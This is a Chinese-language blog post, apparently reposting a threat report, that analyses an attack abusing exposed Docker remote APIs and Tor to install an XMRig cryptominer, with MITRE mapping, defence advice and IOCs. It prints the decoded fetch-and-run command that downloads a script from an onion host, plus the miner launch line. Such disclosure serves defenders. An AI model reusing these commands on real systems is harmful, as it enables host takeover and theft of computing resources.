揭露利用Tor网络的Docker漏洞攻击链

关键发现

  • 新型攻击结合Docker远程API与Tor匿名网络,在受害系统隐秘部署加密货币挖矿程序
  • 攻击者利用配置不当的Docker API获取容器环境访问权限,通过Tor隐藏活动痕迹
  • 主要攻击目标为云计算密集型行业:科技公司、金融服务机构和医疗组织
  • 攻击工具链包含zstd压缩工具(基于ZStandard算法,以高压缩比和快速解压著称)

攻击流程分析

初始访问阶段

攻击始于对Docker Remote API的探测请求(源IP: 198[.]199[.]72[.]27),随后攻击者创建挂载宿主机根目录的Alpine容器,通过base64编码隐藏恶意命令:

# 解码后的攻击命令
sh -c curl --socks5-hostname tor:9050 -o /docker-init.sh http[:]//xxx.onion/static/docker-init.sh && chmod +x /docker-init.sh && /docker-init.sh

恶意脚本功能

  1. SSH后门配置

    • 修改宿主机SSH配置允许root登录
    • 植入攻击者公钥实现持久化访问
  2. 工具安装

    • 部署masscan端口扫描工具
    • 安装zstd压缩工具和torsocks代理工具
  3. C2通信

    • 通过.onion域名向攻击者C2服务器回传系统信息
  4. 有效载荷投递

    • 通过Tor网络下载Zstandard压缩的恶意二进制文件(system-linux-$(uname -m).zst)

挖矿程序部署

最终执行的XMRig矿工包含完整配置:

./system -o pool.moneroocean.stream:10128 -u 49... -p x -a rx/0

MITRE ATT&CK技术映射

战术阶段 技术点 ID
初始访问 利用公开应用漏洞 T1190
防御规避 文件混淆(Zstd压缩) T1027.015
命令与控制 多跳代理(Tor) T1090.003

防御建议

  1. 严格配置Docker API访问权限,仅允许可信网络访问
  2. 容器运行时禁止使用root权限
  3. 定期审计容器镜像及运行实例
  4. 启用Trend Vision One:trade_mark:威胁检测功能(提供相关IOC狩猎查询)

威胁指标(IOC)

SHA256 文件名称 检测名称
1bb95a02f1c12... pkg-updater Coinminer.Linux.MALXMR.SMDSL64
http[:]//xxx.onion/static/docker-init.sh 恶意脚本下载URL

更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码

posted @ 2025-07-26 08:01  qife  阅读(22)  评论(0)    收藏  举报